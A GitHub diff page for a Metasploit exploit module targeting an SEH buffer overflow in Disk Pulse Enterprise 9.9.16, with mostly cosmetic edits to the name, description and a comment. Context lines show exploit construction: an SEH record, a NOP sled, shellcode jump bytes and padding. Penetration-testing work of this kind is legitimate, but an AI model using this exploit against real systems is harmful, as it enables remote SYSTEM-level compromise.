File tree Expand file tree Collapse file tree 1 file changed +3
-3
lines changed
modules/exploits/windows/http Expand file tree Collapse file tree 1 file changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -13,10 +13,10 @@ class MetasploitModule < Msf::Exploit::Remote
13
13
14
14
def initialize ( info = { } )
15
15
super ( update_info ( info ,
16
- 'Name' => 'Disk Pulse Enterprise Login Buffer Overflow' ,
16
+ 'Name' => 'Disk Pulse Enterprise GET Buffer Overflow' ,
17
17
'Description' => %q{
18
18
This module exploits an SEH buffer overflow in Disk Pulse Enterprise
19
- 9.9.16. If a malicious user sends a malicious HTTP GET request,
19
+ 9.9.16. If a malicious user sends a crafted HTTP GET request
20
20
it is possible to execute a payload that would run under the Windows
21
21
NT AUTHORITY\SYSTEM account.
22
22
} ,
@@ -79,7 +79,7 @@ def exploit
79
79
exp << generate_seh_record ( target . ret )
80
80
exp << make_nops ( 10 ) # NOP sled to make sure we land on jmp to shellcode
81
81
exp << "\xE9 \x25 \xBF \xFF \xFF " # jmp 0xffffbf2a - jmp back to shellcode start
82
- exp << 'B' * ( 5000 - exp . length ) #padding
82
+ exp << 'B' * ( 5000 - exp . length ) # padding
83
83
84
84
print_status ( "Sending exploit..." )
85
85
You can’t perform that action at this time.
0 commit comments